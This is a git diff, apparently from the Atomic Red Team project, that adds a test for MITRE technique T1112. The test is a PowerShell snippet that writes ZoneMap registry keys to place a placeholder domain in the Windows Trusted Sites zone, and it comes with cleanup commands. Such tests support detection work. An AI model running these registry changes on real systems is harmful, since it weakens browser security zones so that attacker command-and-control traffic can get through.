diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index f7dc1c86..f3e8e496 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -20,6 +20,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
+- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
+
@@ -180,3 +182,30 @@ Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_
```
+
+
+## Atomic Test #6 - Add domain to Trusted sites Zone
+Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
+https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$name ="bad-subdomain"
+new-item $key -Name $name -Force
+new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
+new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
+new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
+```
+
+
+#### Cleanup Commands:
+```
+$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+Remove-item $key -Recurse
+```
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 277be38f..2e9cc3d3 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -316,6 +316,7 @@
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
+ - Atomic Test #6: Add domain to Trusted sites Zone [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index f2ca259b..89af6041 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -9907,6 +9907,24 @@ defense-evasion:
-Name #{registry_entry_storage}
'
+ - name: Add domain to Trusted sites Zone
+ description: "Attackers may add a domain to the trusted site zone to bypass
+ defenses. Doing this enables attacks such as c2 over office365 as described
+ here:\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
+ \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "$key= \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet
+ Settings\\ZoneMap\\Domains\\bad-domain.com\\\"\n$name =\"bad-subdomain\"\nnew-item
+ $key -Name $name -Force\nnew-itemproperty $key$name -Name https -Value 2
+ -Type DWORD; \nnew-itemproperty $key$name -Name http -Value 2 -Type DWORD;
+ \nnew-itemproperty $key$name -Name * -Value 2 -Type DWORD; \n"
+ cleanup_command: |-
+ $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+ Remove-item $key -Recurse
T1170:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index b9d3f405..1a50374e 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -113,6 +113,7 @@
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
+ - Atomic Test #6: Add domain to Trusted sites Zone [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]